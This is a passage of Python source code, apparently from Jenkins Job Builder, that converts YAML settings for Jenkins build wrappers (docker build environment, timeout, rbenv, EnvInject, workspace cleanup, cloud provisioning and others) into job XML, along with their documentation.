:arg str docker-tool: The name of the docker installation to use
(default 'Default')
:arg str host: URI to the docker host you are using
:arg str credentials-id: Argument to specify the ID of credentials to use
for docker host (optional)
:arg str registry-credentials-id: Argument to specify the ID of
credentials to use for docker registry (optional)
:arg list volumes: Volumes to bind mound from slave host into container
:volume: * **host-path** (`str`) Path on host
* **path** (`str`) Path inside container
:arg bool verbose: Log docker commands executed by plugin on build log
(default false)
:arg bool privileged: Run in privileged mode (default false)
:arg bool force-pull: Force pull (default false)
:arg str group: The user to run build has to be the same as the Jenkins
slave user so files created in workspace have adequate owner and
permission set
:arg str command: Container start command (default '/bin/cat')
:arg str net: Network bridge (default 'bridge')
.. _image_types:
================== ====================================================
Image Type Description
================== ====================================================
dockerfile Build docker image from a Dockerfile in project
workspace. With this option, project can define the
build environment as a Dockerfile stored in SCM with
project source code
:context-path: (str) Path to docker context
(default '.')
:dockerfile: (str) Use an alternate Dockerfile to
build the container hosting this build
(default 'Dockerfile')
pull Pull specified docker image from Docker repository
:image: (str) Image id/tag
================== ====================================================
Example:
.. literalinclude::
/../../tests/wrappers/fixtures/docker-custom-build-env001.yaml
:language: yaml
"""
core_prefix = 'com.cloudbees.jenkins.plugins.okidocki.'
entry_xml = XML.SubElement(
xml_parent, core_prefix + 'DockerBuildWrapper')
entry_xml.set('plugin', 'docker-custom-build-environment')
selectorobj = XML.SubElement(entry_xml, 'selector')
image_type = data['image-type']
if image_type == 'dockerfile':
selectorobj.set('class', core_prefix + 'DockerfileImageSelector')
dockerfile_mapping = [
('context-path', 'contextPath', '.'),
('dockerfile', 'dockerfile', 'Dockerfile')]
convert_mapping_to_xml(selectorobj, data,
dockerfile_mapping, fail_required=True)
elif image_type == 'pull':
selectorobj.set('class', core_prefix + 'PullDockerImageSelector')
pull_mapping = [('image', 'image', '')]
convert_mapping_to_xml(selectorobj, data,
pull_mapping, fail_required=True)
XML.SubElement(entry_xml, 'dockerInstallation').text = data.get(
'docker-tool', 'Default')
host = XML.SubElement(entry_xml, 'dockerHost')
host.set('plugin', 'docker-commons')
mapping_optional = [
('host', 'uri', None),
('credentials-id', 'credentialsId', None)]
convert_mapping_to_xml(host, data, mapping_optional, fail_required=False)
XML.SubElement(entry_xml, 'dockerRegistryCredentials').text = data.get(
'registry-credentials-id', '')
volumesobj = XML.SubElement(entry_xml, 'volumes')
volumes = data.get('volumes', [])
if not volumes:
volumesobj.set('class', 'empty-list')
else:
for volume in volumes:
volumeobj = XML.SubElement(
volumesobj, 'com.cloudbees.jenkins.plugins.okidocki.Volume')
XML.SubElement(volumeobj, 'hostPath').text = volume['volume'].get(
'host-path', '')
XML.SubElement(volumeobj, 'path').text = volume['volume'].get(
'path', '')
mapping = [
('force-pull', 'forcePull', False),
('privileged', 'privileged', False),
('verbose', 'verbose', False),
('group', 'group', ''),
('command', 'command', '/bin/cat'),
('net', 'net', 'bridge')]
convert_mapping_to_xml(entry_xml, data, mapping, fail_required=True)
def ci_skip(registry, xml_parent, data):
"""yaml: ci-skip
Skip making a build for certain push.
Just add [ci skip] into your commit's message to let Jenkins know,
that you do not want to perform build for the next push.
Requires the Jenkins :jenkins-wiki:`Ci Skip Plugin <Ci+Skip+Plugin>`.
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/ci-skip001.yaml
"""
rpobj = XML.SubElement(xml_parent, 'ruby-proxy-object')
robj = XML.SubElement(rpobj, 'ruby-object', attrib={
'pluginid': 'ci-skip',
'ruby-class': 'Jenkins::Tasks::BuildWrapperProxy'
})
pluginid = XML.SubElement(robj, 'pluginid', {
'pluginid': 'ci-skip', 'ruby-class': 'String'
})
pluginid.text = 'ci-skip'
obj = XML.SubElement(robj, 'object', {
'ruby-class': 'CiSkipWrapper', 'pluginid': 'ci-skip'
})
XML.SubElement(obj, 'ci__skip', {
'pluginid': 'ci-skip', 'ruby-class': 'NilClass'
})
def config_file_provider(registry, xml_parent, data):
"""yaml: config-file-provider
Provide configuration files (i.e., settings.xml for maven etc.)
which will be copied to the job's workspace.
Requires the Jenkins :jenkins-wiki:`Config File Provider Plugin
<Config+File+Provider+Plugin>`.
:arg list files: List of managed config files made up of three
parameters
:files: * **file-id** (`str`) -- The identifier for the managed config
file
* **target** (`str`) -- Define where the file should be created
(default '')
* **variable** (`str`) -- Define an environment variable to be
used (default '')
Example:
.. literalinclude:: \
/../../tests/wrappers/fixtures/config-file-provider003.yaml
:language: yaml
"""
cfp = XML.SubElement(xml_parent, 'org.jenkinsci.plugins.configfiles.'
'buildwrapper.ConfigFileBuildWrapper')
cfp.set('plugin', 'config-file-provider')
config_file_provider_builder(cfp, data)
def logfilesize(registry, xml_parent, data):
"""yaml: logfilesize
Abort the build if its logfile becomes too big.
Requires the Jenkins :jenkins-wiki:`Logfilesizechecker Plugin
<Logfilesizechecker+Plugin>`.
:arg bool set-own: Use job specific maximum log size instead of global
config value (default false).
:arg bool fail: Make builds aborted by this wrapper be marked as "failed"
(default false).
:arg int size: Abort the build if logfile size is bigger than this
value (in MiB, default 128). Only applies if set-own is true.
Full Example:
.. literalinclude:: /../../tests/wrappers/fixtures/logfilesize-full.yaml
Minimal Example:
.. literalinclude:: /../../tests/wrappers/fixtures/logfilesize-minimal.yaml
"""
lfswrapper = XML.SubElement(xml_parent,
'hudson.plugins.logfilesizechecker.'
'LogfilesizecheckerWrapper')
lfswrapper.set("plugin", "logfilesizechecker")
mapping = [
('set-own', 'setOwn', False),
('size', 'maxLogSize', 128),
('fail', 'failBuild', False),
]
convert_mapping_to_xml(lfswrapper, data, mapping, fail_required=True)
def timeout(registry, xml_parent, data):
"""yaml: timeout
Abort the build if it runs too long.
Requires the Jenkins :jenkins-wiki:`Build Timeout Plugin
<Build-timeout+Plugin>`.
:arg bool fail: Mark the build as failed (default false)
:arg bool abort: Mark the build as aborted (default false)
:arg bool write-description: Write a message in the description
(default false)
:arg int timeout: Abort the build after this number of minutes (default 3)
:arg str timeout-var: Export an environment variable to reference the
timeout value (optional)
:arg str type: Timeout type to use (default absolute)
:type values:
* **likely-stuck**
* **no-activity**
* **elastic**
* **absolute**
* **deadline**
:arg int elastic-percentage: Percentage of the three most recent builds
where to declare a timeout, only applies to **elastic** type.
(default 0)
:arg int elastic-number-builds: Number of builds to consider computing
average duration, only applies to **elastic** type. (default 3)
:arg int elastic-default-timeout: Timeout to use if there were no previous
builds, only applies to **elastic** type. (default 3)
:arg str deadline-time: Build terminate automatically at next deadline time
(HH:MM:SS), only applies to **deadline** type. (default 0:00:00)
:arg int deadline-tolerance: Period in minutes after deadline when a job
should be immediately aborted, only applies to **deadline** type.
(default 1)
Example (Version < 1.14):
.. literalinclude:: /../../tests/wrappers/fixtures/timeout/timeout001.yaml
.. literalinclude:: /../../tests/wrappers/fixtures/timeout/timeout002.yaml
.. literalinclude:: /../../tests/wrappers/fixtures/timeout/timeout003.yaml
Example (Version >= 1.14):
.. literalinclude::
/../../tests/wrappers/fixtures/timeout/version-1.14/absolute001.yaml
.. literalinclude::
/../../tests/wrappers/fixtures/timeout/version-1.14/no-activity001.yaml
.. literalinclude::
/../../tests/wrappers/fixtures/timeout/version-1.14/likely-stuck001.yaml
.. literalinclude::
/../../tests/wrappers/fixtures/timeout/version-1.14/elastic001.yaml
.. literalinclude::
/../../tests/wrappers/fixtures/timeout/version-1.15/deadline001.yaml
"""
prefix = 'hudson.plugins.build__timeout.'
twrapper = XML.SubElement(xml_parent, prefix + 'BuildTimeoutWrapper')
plugin_info = registry.get_plugin_info("Build Timeout")
if "version" not in plugin_info:
plugin_info = registry.get_plugin_info("Jenkins build timeout plugin")
version = plugin_info.get("version", None)
if version:
version = pkg_resources.parse_version(version)
valid_strategies = ['absolute', 'no-activity', 'likely-stuck', 'elastic',
'deadline']
# NOTE(toabctl): if we don't know the version assume that we
# use a newer version of the plugin
if not version or version >= pkg_resources.parse_version("1.14"):
strategy = data.get('type', 'absolute')
if strategy not in valid_strategies:
InvalidAttributeError('type', strategy, valid_strategies)
if strategy == "absolute":
strategy_element = XML.SubElement(
twrapper, 'strategy',
{'class': "hudson.plugins.build_timeout."
"impl.AbsoluteTimeOutStrategy"})
mapping = [('timeout', 'timeoutMinutes', 3)]
convert_mapping_to_xml(strategy_element,
data, mapping, fail_required=True)
elif strategy == "no-activity":
strategy_element = XML.SubElement(
twrapper, 'strategy',
{'class': "hudson.plugins.build_timeout."
"impl.NoActivityTimeOutStrategy"})
timeout_sec = int(data.get('timeout', 3)) * MIN_TO_SEC
mapping = [('', 'timeoutSecondsString', timeout_sec)]
convert_mapping_to_xml(strategy_element,
data, mapping, fail_required=True)
elif strategy == "likely-stuck":
strategy_element = XML.SubElement(
twrapper, 'strategy',
{'class': "hudson.plugins.build_timeout."
"impl.LikelyStuckTimeOutStrategy"})
mapping = [('timeout', 'timeoutMinutes', 3)]
convert_mapping_to_xml(strategy_element,
data, mapping, fail_required=True)
elif strategy == "elastic":
strategy_element = XML.SubElement(
twrapper, 'strategy',
{'class': "hudson.plugins.build_timeout."
"impl.ElasticTimeOutStrategy"})
mapping = [
('elastic-percentage', 'timeoutPercentage', 0),
('elastic-number-builds', 'numberOfBuilds', 0),
('elastic-default-timeout', 'timeoutMinutesElasticDefault', 3)]
convert_mapping_to_xml(strategy_element,
data, mapping, fail_required=True)
elif strategy == "deadline":
strategy_element = XML.SubElement(
twrapper, 'strategy',
{'class': "hudson.plugins.build_timeout."
"impl.DeadlineTimeOutStrategy"})
deadline_time = str(data.get('deadline-time', '0:00:00'))
deadline_tolerance = int(data.get('deadline-tolerance', 1))
mapping = [
('', 'deadlineTime', deadline_time),
('', 'deadlineToleranceInMinutes', deadline_tolerance)]
convert_mapping_to_xml(strategy_element,
data, mapping, fail_required=True)
actions = []
for action in ['fail', 'abort']:
if str(data.get(action, 'false')).lower() == 'true':
actions.append(action)
# Set the default action to "abort"
if len(actions) == 0:
actions.append("abort")
description = data.get('write-description', None)
if description is not None:
actions.append('write-description')
operation_list = XML.SubElement(twrapper, 'operationList')
for action in actions:
fmt_str = prefix + "operations.{0}Operation"
if action == "abort":
XML.SubElement(operation_list, fmt_str.format("Abort"))
elif action == "fail":
XML.SubElement(operation_list, fmt_str.format("Fail"))
elif action == "write-description":
write_description = XML.SubElement(
operation_list, fmt_str.format("WriteDescription"))
XML.SubElement(write_description, "description"
).text = description
else:
raise JenkinsJobsException("Unsupported BuiltTimeoutWrapper "
"plugin action: {0}".format(action))
mapping = [('timeout-var', 'timeoutEnvVar', None)]
convert_mapping_to_xml(twrapper,
data, mapping, fail_required=False)
else:
mapping = [
('timeout', 'timeoutMinutes', 3),
('timeout-var', 'timeoutEnvVar', None),
('fail', 'failBuild', 'false'),
('write-description', 'writingDescription', 'false'),
('elastic-percentage', 'timeoutPercentage', 0),
('elastic-default-timeout', 'timeoutMinutesElasticDefault', 3)]
convert_mapping_to_xml(twrapper,
data, mapping, fail_required=False)
tout_type = str(data.get('type', 'absolute')).lower()
if tout_type == 'likely-stuck':
tout_type = 'likelyStuck'
XML.SubElement(twrapper, 'timeoutType').text = tout_type
def timestamps(registry, xml_parent, data):
"""yaml: timestamps
Add timestamps to the console log.
Requires the Jenkins :jenkins-wiki:`Timestamper Plugin <Timestamper>`.
Example::
wrappers:
- timestamps
"""
XML.SubElement(xml_parent,
'hudson.plugins.timestamper.TimestamperBuildWrapper')
def ansicolor(registry, xml_parent, data):
"""yaml: ansicolor
Translate ANSI color codes to HTML in the console log.
Requires the Jenkins :jenkins-wiki:`Ansi Color Plugin <AnsiColor+Plugin>`.
:arg string colormap: (optional) color mapping to use
Examples::
wrappers:
- ansicolor
# Explicitly setting the colormap
wrappers:
- ansicolor:
colormap: vga
"""
cwrapper = XML.SubElement(
xml_parent,
'hudson.plugins.ansicolor.AnsiColorBuildWrapper')
mapping = [('colormap', 'colorMapName', None)]
convert_mapping_to_xml(cwrapper, data, mapping, fail_required=False)
def build_keeper(registry, xml_parent, data):
"""yaml: build-keeper
Keep builds based on specific policy.
Requires the Jenkins :jenkins-wiki:`Build Keeper Plugin
<Build+Keeper+Plugin>`.
:arg str policy: Policy to keep builds.
:policy values:
* **by-day**
* **keep-since**
* **build-number**
* **keep-first-failed**
:arg int build-period: Number argument to calculate build to keep,
depends on the policy. (default 0)
:arg bool dont-keep-failed: Flag to indicate if to keep failed builds.
(default false)
:arg int number-of-fails: number of consecutive failed builds in order
to mark first as keep forever, only applies to keep-first-failed
policy (default 0)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/build-keeper0001.yaml
.. literalinclude:: /../../tests/wrappers/fixtures/build-keeper0002.yaml
"""
root = XML.SubElement(xml_parent,
'org.jenkins__ci.plugins.build__keeper.BuildKeeper')
valid_policies = ('by-day', 'keep-since', 'build-number',
'keep-first-failed')
policy = data.get('policy')
mapping = [
('build-period', 'buildPeriod', 0),
('dont-keep-failed', 'dontKeepFailed', False)]
if policy == 'by-day':
policy_element = XML.SubElement(root,
'policy',
{'class': 'org.jenkins_ci.plugins.'
'build_keeper.ByDayPolicy'})
elif policy == 'keep-since':
policy_element = XML.SubElement(root,
'policy',
{'class': 'org.jenkins_ci.plugins.'
'build_keeper.KeepSincePolicy'})
elif policy == 'build-number':
policy_element = XML.SubElement(root,
'policy',
{'class': 'org.jenkins_ci.plugins.'
'build_keeper.BuildNumberPolicy'})
elif policy == 'keep-first-failed':
policy_element = XML.SubElement(root,
'policy',
{'class': 'org.jenkins_ci.plugins.'
'build_keeper.KeepFirstFailedPolicy'})
mapping = [('number-of-fails', 'numberOfFails', 0)]
else:
InvalidAttributeError('policy', policy, valid_policies)
convert_mapping_to_xml(policy_element, data, mapping, fail_required=True)
def live_screenshot(registry, xml_parent, data):
"""yaml: live-screenshot
Show live screenshots of running jobs in the job list.
Requires the Jenkins :jenkins-wiki:`Live-Screenshot Plugin
<LiveScreenshot+Plugin>`.
:arg str full-size: name of screenshot file (default 'screenshot.png')
:arg str thumbnail: name of thumbnail file (default 'screenshot-thumb.png')
File type must be .png and they must be located inside the $WORKDIR.
Full Example:
.. literalinclude::
/../../tests/wrappers/fixtures/live-screenshot-full.yaml
Minimal Example:
.. literalinclude::
/../../tests/wrappers/fixtures/live-screenshot-minimal.yaml
"""
live = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.livescreenshot.LiveScreenshotBuildWrapper')
live.set('plugin', 'livescreenshot')
mapping = [
('full-size', 'fullscreenFilename', 'screenshot.png'),
('thumbnail', 'thumbnailFilename', 'screenshot-thumb.png'),
]
convert_mapping_to_xml(live, data, mapping, fail_required=True)
def mask_passwords(registry, xml_parent, data):
"""yaml: mask-passwords
Hide passwords in the console log.
Requires the Jenkins :jenkins-wiki:`Mask Passwords Plugin
<Mask+Passwords+Plugin>`.
Example::
wrappers:
- mask-passwords
"""
XML.SubElement(xml_parent,
'com.michelin.cio.hudson.plugins.maskpasswords.'
'MaskPasswordsBuildWrapper')
def workspace_cleanup(registry, xml_parent, data):
"""yaml: workspace-cleanup (pre-build)
Requires the Jenkins :jenkins-wiki:`Workspace Cleanup Plugin
<Workspace+Cleanup+Plugin>`.
The post-build workspace-cleanup is available as a publisher.
:arg list include: list of files to be included
:arg list exclude: list of files to be excluded
:arg bool dirmatch: Apply pattern to directories too (default false)
:arg str check-parameter: boolean environment variable to check to
determine whether to actually clean up
:arg str external-deletion-command: external deletion command to run
against files and directories
Full Example:
.. literalinclude::
/../../tests/wrappers/fixtures/workspace-cleanup-full.yaml
:language: yaml
Minimal Example:
.. literalinclude::
/../../tests/wrappers/fixtures/workspace-cleanup-min.yaml
:language: yaml
"""
p = XML.SubElement(xml_parent,
'hudson.plugins.ws__cleanup.PreBuildCleanup')
p.set("plugin", "ws-cleanup")
if "include" in data or "exclude" in data:
patterns = XML.SubElement(p, 'patterns')
for inc in data.get("include", []):
ptrn = XML.SubElement(patterns, 'hudson.plugins.ws__cleanup.Pattern')
mapping = [
('', 'pattern', inc),
('', 'type', "INCLUDE")]
convert_mapping_to_xml(ptrn, data, mapping, fail_required=True)
for exc in data.get("exclude", []):
ptrn = XML.SubElement(patterns, 'hudson.plugins.ws__cleanup.Pattern')
mapping = [
('', 'pattern', exc),
('', 'type', "EXCLUDE")]
convert_mapping_to_xml(ptrn, data, mapping, fail_required=True)
mapping = [
("dirmatch", 'deleteDirs', False),
('check-parameter', 'cleanupParameter', ''),
('external-deletion-command', 'externalDelete', '')]
convert_mapping_to_xml(p, data, mapping, fail_required=True)
def m2_repository_cleanup(registry, xml_parent, data):
"""yaml: m2-repository-cleanup
Configure M2 Repository Cleanup
Requires the Jenkins :jenkins-wiki:`M2 Repository Cleanup
<M2+Repository+Cleanup+Plugin>`.
:arg list patterns: List of patterns for artifacts to cleanup before
building. (optional)
This plugin allows you to configure a maven2 job to clean some or all of
the artifacts from the repository before it runs.
Example:
.. literalinclude:: \
../../tests/wrappers/fixtures/m2-repository-cleanup001.yaml
"""
m2repo = XML.SubElement(
xml_parent,
'hudson.plugins.m2__repo__reaper.M2RepoReaperWrapper')
m2repo.set("plugin", "m2-repo-reaper")
patterns = data.get("patterns", [])
XML.SubElement(m2repo, 'artifactPatterns').text = ",".join(patterns)
p = XML.SubElement(m2repo, 'patterns')
for pattern in patterns:
XML.SubElement(p, 'string').text = pattern
def rvm_env(registry, xml_parent, data):
"""yaml: rvm-env
Set the RVM implementation
Requires the Jenkins :jenkins-wiki:`Rvm Plugin <RVM+Plugin>`.
:arg str implementation: Type of implementation. Syntax is RUBY[@GEMSET],
such as '1.9.3' or 'jruby@foo'.
Example::
wrappers:
- rvm-env:
implementation: 1.9.3
"""
rpo = XML.SubElement(xml_parent,
'ruby-proxy-object')
ro_class = "Jenkins::Plugin::Proxies::BuildWrapper"
ro = XML.SubElement(rpo,
'ruby-object',
{'ruby-class': ro_class,
'pluginid': 'rvm'})
o = XML.SubElement(ro,
'object',
{'ruby-class': 'RvmWrapper',
'pluginid': 'rvm'})
XML.SubElement(o,
'impl',
{'pluginid': 'rvm',
'ruby-class': 'String'}).text = data['implementation']
XML.SubElement(ro,
'pluginid',
{'pluginid': 'rvm',
'ruby-class': 'String'}).text = "rvm"
def rbenv(registry, xml_parent, data):
"""yaml: rbenv
Set the rbenv implementation.
Requires the Jenkins :jenkins-wiki:`rbenv plugin <rbenv+plugin>`.
All parameters are optional.
:arg str ruby-version: Version of Ruby to use (default 1.9.3-p484)
:arg bool ignore-local-version: If true, ignore local Ruby
version (defined in the ".ruby-version" file in workspace) even if it
has been defined (default false)
:arg str preinstall-gem-list: List of gems to install
(default 'bundler,rake')
:arg str rbenv-root: RBENV_ROOT (default $HOME/.rbenv)
:arg str rbenv-repo: Which repo to clone rbenv from
(default https://github.com/rbenv/rbenv)
:arg str rbenv-branch: Which branch to clone rbenv from (default master)
:arg str ruby-build-repo: Which repo to clone ruby-build from
(default https://github.com/rbenv/ruby-build)
:arg str ruby-build-branch: Which branch to clone ruby-build from
(default master)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/rbenv003.yaml
"""
mapping = [
# option, xml name, default value (text), attributes (hard coded)
("preinstall-gem-list", 'gem__list', 'bundler,rake'),
("rbenv-root", 'rbenv__root', '$HOME/.rbenv'),
("rbenv-repo", 'rbenv__repository',
'https://github.com/rbenv/rbenv'),
("rbenv-branch", 'rbenv__revision', 'master'),
("ruby-build-repo", 'ruby__build__repository',
'https://github.com/rbenv/ruby-build'),
("ruby-build-branch", 'ruby__build__revision', 'master'),
("ruby-version", 'version', '1.9.3-p484'),
]
rpo = XML.SubElement(xml_parent,
'ruby-proxy-object')
ro_class = "Jenkins::Tasks::BuildWrapperProxy"
ro = XML.SubElement(rpo,
'ruby-object',
{'ruby-class': ro_class,
'pluginid': 'rbenv'})
XML.SubElement(ro,
'pluginid',
{'pluginid': "rbenv",
'ruby-class': "String"}).text = "rbenv"
o = XML.SubElement(ro,
'object',
{'ruby-class': 'RbenvWrapper',
'pluginid': 'rbenv'})
for elem in mapping:
(optname, xmlname, val) = elem[:3]
xe = XML.SubElement(o,
xmlname,
{'ruby-class': "String",
'pluginid': "rbenv"})
if optname and optname in data:
val = data[optname]
if type(val) == bool:
xe.text = str(val).lower()
else:
xe.text = val
ignore_local_class = 'FalseClass'
if 'ignore-local-version' in data:
ignore_local_string = str(data['ignore-local-version']).lower()
if ignore_local_string == 'true':
ignore_local_class = 'TrueClass'
XML.SubElement(o,
'ignore__local__version',
{'ruby-class': ignore_local_class,
'pluginid': 'rbenv'})
def build_name(registry, xml_parent, data):
"""yaml: build-name
Set the name of the build
Requires the Jenkins :jenkins-wiki:`Build Name Setter Plugin
<Build+Name+Setter+Plugin>`.
:arg str name: Name for the build. Typically you would use a variable
from Jenkins in the name. The syntax would be ${FOO} for
the FOO variable.
Example::
wrappers:
- build-name:
name: Build-${FOO}
"""
bsetter = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.buildnamesetter.'
'BuildNameSetter')
mapping = [('name', 'template', None)]
convert_mapping_to_xml(bsetter, data, mapping, fail_required=True)
def port_allocator(registry, xml_parent, data):
"""yaml: port-allocator
Assign unique TCP port numbers
Requires the Jenkins :jenkins-wiki:`Port Allocator Plugin
<Port+Allocator+Plugin>`.
:arg str name: Deprecated, use names instead
:arg list names: Variable list of names of the port or list of
specific port numbers
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/port-allocator002.yaml
"""
pa = XML.SubElement(xml_parent,
'org.jvnet.hudson.plugins.port__allocator.'
'PortAllocator')
ports = XML.SubElement(pa, 'ports')
names = data.get('names')
if not names:
logger = logging.getLogger(__name__)
logger.warning(
'port_allocator name is deprecated, use a names list '
' instead')
names = [data['name']]
for name in names:
dpt = XML.SubElement(ports,
'org.jvnet.hudson.plugins.port__allocator.'
'DefaultPortType')
XML.SubElement(dpt, 'name').text = name
def locks(registry, xml_parent, data):
"""yaml: locks
Control parallel execution of jobs.
Requires the Jenkins :jenkins-wiki:`Locks and Latches Plugin
<Locks+and+Latches+plugin>`.
:arg: list of locks to use
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/locks002.yaml
:language: yaml
"""
locks = data
if locks:
lw = XML.SubElement(xml_parent,
'hudson.plugins.locksandlatches.LockWrapper')
locktop = XML.SubElement(lw, 'locks')
for lock in locks:
lockwrapper = XML.SubElement(locktop,
'hudson.plugins.locksandlatches.'
'LockWrapper_-LockWaitConfig')
XML.SubElement(lockwrapper, 'name').text = lock
def copy_to_slave(registry, xml_parent, data):
"""yaml: copy-to-slave
Copy files to slave before build
Requires the Jenkins :jenkins-wiki:`Copy To Slave Plugin
<Copy+To+Slave+Plugin>`.
:arg list includes: list of file patterns to copy (optional)
:arg list excludes: list of file patterns to exclude (optional)
:arg bool flatten: flatten directory structure (default false)
:arg str relative-to: base location of includes/excludes, must be home
($JENKINS_HOME), somewhereElse ($JENKINS_HOME/copyToSlave),
userContent ($JENKINS_HOME/userContent) or workspace
(default userContent)
:arg bool include-ant-excludes: exclude ant's default excludes
(default false)
Minimal Example:
.. literalinclude:: /../../tests/wrappers/fixtures/copy-to-slave001.yaml
:language: yaml
Full Example:
.. literalinclude:: /../../tests/wrappers/fixtures/copy-to-slave002.yaml
:language: yaml
"""
p = 'com.michelin.cio.hudson.plugins.copytoslave.CopyToSlaveBuildWrapper'
cs = XML.SubElement(xml_parent, p)
XML.SubElement(cs, 'includes').text = ','.join(data.get('includes', ['']))
XML.SubElement(cs, 'excludes').text = ','.join(data.get('excludes', ['']))
locations = ['home', 'somewhereElse', 'userContent', 'workspace']
mapping = [
('flatten', 'flatten', False),
('include-ant-excludes', 'includeAntExcludes', False),
('relative-to', 'relativeTo', 'userContent', locations),
('', 'hudsonHomeRelative', False)]
convert_mapping_to_xml(cs, data, mapping, fail_required=True)
def inject(registry, xml_parent, data):
"""yaml: inject
Add or override environment variables to the whole build process
Requires the Jenkins :jenkins-wiki:`EnvInject Plugin <EnvInject+Plugin>`.
:arg str properties-file: path to the properties file (optional)
:arg str properties-content: key value pair of properties (optional)
:arg str script-file: path to the script file (optional)
:arg str script-content: contents of a script (optional)
:arg bool load-from-master: load files from master (default false)
Example::
wrappers:
- inject:
properties-file: /usr/local/foo
properties-content: PATH=/foo/bar
script-file: /usr/local/foo.sh
script-content: echo $PATH
"""
eib = XML.SubElement(xml_parent, 'EnvInjectBuildWrapper')
info = XML.SubElement(eib, 'info')
mapping = [
('properties-file', 'propertiesFilePath', None),
('properties-content', 'propertiesContent', None),
('script-file', 'scriptFilePath', None),
('script-content', 'scriptContent', None),
('load-from-master', 'loadFilesFromMaster', False),
]
convert_mapping_to_xml(info, data, mapping, fail_required=False)
def inject_ownership_variables(registry, xml_parent, data):
"""yaml: inject-ownership-variables
Inject ownership variables to the build as environment variables.
Requires the Jenkins :jenkins-wiki:`EnvInject Plugin <EnvInject+Plugin>`
and Jenkins :jenkins-wiki:`Ownership plugin <Ownership+Plugin>`.
:arg bool job-variables: inject job ownership variables to the job
(default false)
:arg bool node-variables: inject node ownership variables to the job
(default false)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/ownership001.yaml
"""
ownership = XML.SubElement(xml_parent, 'com.synopsys.arc.jenkins.plugins.'
'ownership.wrappers.OwnershipBuildWrapper')
mapping = [
('node-variables', 'injectNodeOwnership', False),
('job-variables', 'injectJobOwnership', False)]
convert_mapping_to_xml(ownership, data, mapping, fail_required=True)
def inject_passwords(registry, xml_parent, data):
"""yaml: inject-passwords
Inject passwords to the build as environment variables.
Requires the Jenkins :jenkins-wiki:`EnvInject Plugin <EnvInject+Plugin>`.
:arg bool global: inject global passwords to the job
:arg bool mask-password-params: mask password parameters
:arg list job-passwords: key value pair of job passwords
:Parameter: * **name** (`str`) Name of password
* **password** (`str`) Encrypted password
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/passwords001.yaml
"""
eib = XML.SubElement(xml_parent, 'EnvInjectPasswordWrapper')
XML.SubElement(eib, 'injectGlobalPasswords').text = \
str(data.get('global', False)).lower()
XML.SubElement(eib, 'maskPasswordParameters').text = \
str(data.get('mask-password-params', False)).lower()
entries = XML.SubElement(eib, 'passwordEntries')
passwords = data.get('job-passwords', [])
if passwords:
for password in passwords:
entry = XML.SubElement(entries, 'EnvInjectPasswordEntry')
XML.SubElement(entry, 'name').text = password['name']
XML.SubElement(entry, 'value').text = password['password']
def env_file(registry, xml_parent, data):
"""yaml: env-file
Add or override environment variables to the whole build process
Requires the Jenkins :jenkins-wiki:`Environment File Plugin
<Envfile+Plugin>`.
:arg str properties-file: path to the properties file (optional)
Example::
wrappers:
- env-file:
properties-file: ${WORKSPACE}/foo
"""
eib = XML.SubElement(xml_parent,
'hudson.plugins.envfile.EnvFileBuildWrapper')
mapping = [
('properties-file', 'filePath', None),
]
convert_mapping_to_xml(eib, data, mapping, fail_required=False)
def env_script(registry, xml_parent, data):
"""yaml: env-script
Add or override environment variables to the whole build process.
Requires the Jenkins :jenkins-wiki:`Environment Script Plugin
<Environment+Script+Plugin>`.
:arg script-content: The script to run (default '')
:arg str script-type: The script type.
:script-types supported:
* **unix-script** (default)
* **power-shell**
* **batch-script**
:arg only-run-on-parent: Only applicable for Matrix Jobs. If true, run only
on the matrix parent job (default false)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/env-script001.yaml
"""
el = XML.SubElement(xml_parent, 'com.lookout.jenkins.EnvironmentScript')
valid_script_types = {
'unix-script': 'unixScript',
'power-shell': 'powerShell',
'batch-script': 'batchScript',
}
mapping = [
('script-content', 'script', ''),
('script-type', 'scriptType', 'unix-script', valid_script_types),
('only-run-on-parent', 'onlyRunOnParent', False)]
convert_mapping_to_xml(el, data, mapping, fail_required=True)
def jclouds(registry, xml_parent, data):
"""yaml: jclouds
Uses JClouds to provide slave launching on most of the currently
usable Cloud infrastructures.
Requires the Jenkins :jenkins-wiki:`JClouds Plugin <JClouds+Plugin>`.
:arg bool single-use: Whether or not to terminate the slave after use
(default false).
:arg list instances: The name of the jclouds template to create an
instance from, and its parameters.
:arg str cloud-name: The name of the jclouds profile containing the
specified template.
:arg int count: How many instances to create (default 1).
:arg bool stop-on-terminate: Whether or not to suspend instead of terminate
the instance (default false).
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/jclouds001.yaml
:language: yaml
"""
if 'instances' in data:
buildWrapper = XML.SubElement(
xml_parent, 'jenkins.plugins.jclouds.compute.JCloudsBuildWrapper')
instances = XML.SubElement(buildWrapper, 'instancesToRun')
for foo in data['instances']:
for template, params in foo.items():
instance = XML.SubElement(instances,
'jenkins.plugins.jclouds.compute.'
'InstancesToRun')
XML.SubElement(instance, 'templateName').text = template
XML.SubElement(instance, 'cloudName').text = \
params.get('cloud-name', '')
XML.SubElement(instance, 'count').text = \
str(params.get('count', 1))
XML.SubElement(instance, 'suspendOrTerminate').text = \
str(params.get('stop-on-terminate', False)).lower()
if data.get('single-use'):
XML.SubElement(xml_parent,
'jenkins.plugins.jclouds.compute.'
'JCloudsOneOffSlave')
def openstack(registry, xml_parent, data):
"""yaml: openstack
Provision slaves from OpenStack on demand. Requires the Jenkins
:jenkins-wiki:`Openstack Cloud Plugin <Openstack+Cloud+Plugin>`.
:arg list instances: List of instances to be launched at the beginning of
the build.
:instances:
* **cloud-name** (`str`) -- The name of the cloud profile which
contains the specified cloud instance template (required).
* **template-name** (`str`) -- The name of the cloud instance
template to create an instance from(required).
* **manual-template** (`bool`) -- If True, instance template name
will be put in 'Specify Template Name as String' option. Not
specifying or specifying False, instance template name will be
put in 'Select Template from List' option. To use parameter
replacement, set this to True. (default false)
* **count** (`int`) -- How many instances to create (default 1).
:arg bool single-use: Whether or not to terminate the slave after use
(default false).
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/openstack001.yaml
"""
tag_prefix = 'jenkins.plugins.openstack.compute.'
if 'instances' in data:
